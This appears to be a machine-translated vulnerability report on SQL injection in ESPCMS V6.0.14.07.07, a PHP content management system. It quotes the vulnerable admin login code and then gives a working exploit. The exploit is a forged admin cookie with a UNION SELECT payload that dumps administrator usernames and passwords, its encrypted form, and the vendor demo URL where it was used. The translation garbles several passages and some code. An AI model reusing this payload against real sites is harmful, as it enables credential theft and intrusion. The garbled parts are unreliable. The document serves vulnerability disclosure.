ESPCMS SQL injection (demo successful)

ESPCMS SQL injection (demo successful)

Rt
V6.0.14.07.07 UTF8

Detailed description:

I have read the WooYun: ESPCMS latest V5.8.14.03.03 UTF8 official version of brute force injection submitted by Daniel

See the latest version and find that the encryption function is still the same --

However, the query is changed to id instead of username,

However, the id is intval.

function member_cookieview($keyword = false) {
$retrunstr = array();
$retrunstr['username'] = $this->fun->eccode($this->fun->accept('ecisp_member_username', 'C'), 'DECODE', db_pscode);
$user_info = explode('|', $this->fun->eccode($this->fun->accept('ecisp_member_info', 'C'), 'DECODE', db_pscode));

list($retrunstr['userid'], $retrunstr['alias'], $retrunstr['integral'], $retrunstr['mcid'], $retrunstr['email'], $retrunstr['lastip'], $retrunstr['ipadd'], $retrunstr['useragent'], $retrunstr['adminclassurl']) = $user_info;

$retrunstr['userid'] = intval($retrunstr['userid']);
$retrunstr['integral'] = intval($retrunstr['integral']);
$retrunstr['mcid'] = intval($retrunstr['mcid']);

return !$keyword ? $retrunstr : $retrunstr[$keyword];
}

I did not find the color pen in the foreground using cookie injection, but the background detected a problem with the management login file.

/Adminsoft/control/management. php

function onhome() {
parent::start_template();

$db_table = db_prefix . 'admin_member';
$db_where = "username='$this->esp_username'";
$rsMember = $this->db->fetch_first('SELECT id,username,password,name,sex,intotime,intime,outtime,ipadd,hit,powergroup,inputclassid,isclass FROM ' . $db_table . ' WHERE ' . $db_where);
$this->ectemplates->assign('username', $rsMember['username']);
$this->ectemplates->assign('name', $rsMember['name']);
if ($rsMember['sex'] == 1) {
$rsMember['sextype'] = $this->lng['select_sex_1'];
} else {
$rsMember['sextype'] = $this->lng['select_sex_0'];
}


$db_table = db_prefix . 'admin_powergroup';
if (empty($rsMember['powergroup']) && empty($rsMember['username'])) {
exit('Cookie err');
}
$db_where = 'id=' . $rsMember['powergroup'];
..............

Here, username is included in the query. Of course, to meet admin_purview ()

$ Arr_purview = explode ('|', $ this-> fun-> eccode ($ ecisp_admininfo, 'decode', db_pscode ));

$ This-> esp_powerlist = explode ('|', $ this-> fun-> eccode ($ esp_powerlist, 'decode', db_pscode ));

List ($ esp_adminuserid, $ this-> esp_username, $ this-> esp_password, $ this-> esp_useragent, $ esp_powerid, $ esp_inputclassid, $ this-> esp_softurl) = $ arr_purview; // esp_username is assigned here to cause Injection
.................
If (empty ($ this-> esp_username) | empty ($ this-> esp_adminuserid) | md5 (admin_AGENT )! = $ This-> esp_useragent | md5 (admin_ClassURL )! = $ This-> esp_softurl) // this condition must be met as before.

Obtain the key using @ Somalia's pirate method and construct a malicious cookie to inject it.

Under the official website test, we won't talk much about the process of getting the key. Stamp here WooYun: ESPCMS latest V5.8.14.03.03 UTF8 official version of brute force injection.



Normally, the decrypted cookie is like this.

1 | admin | md5 (pass) | md5 (admin_AGENT) | 1 | 1 | md5 (admin_ClassURL)



Replace admin with an SQL statement, and change the next two md5 values as follows:

Cookie

1|' union select 1,username,3,password,5,6,7,8,9,10,11,12,13 from espcms_admin_member#|a|a32b0be10848d387fcc64b92239d689f|1|1|29aac6e385cf17b8d63035edfbe068af

Built-in function encryption->

ecisp_admininfo=Zt5YVtnSmaGmWKqe0sbH2FGUkKzUyKfQk9LGjpSO0sOp1t3V1pZhbWGYXW2QnFxrZGlnZZeSkJVjj5Vqgcmn0Z-FxtXRxc_VlcTK082glKWaz5Ob1oesk7SZamvIkcbJYpOca5nHaJppy8TFl5bEm2iVmZ_IaG1xm95ispXgYmuZmZpvy5ScmZTJlW7Dm5mYZZWUl8bGyMSbk5yexZg

Call adminsoft/control/management. php onhome

Http://demo.ecisp.cn/adminsoft/index.php? Archive = management & action = home

Modify the cookie. Well, the data has come out.

Proof of vulnerability:

Solution:

For Mao, do not change the algorithm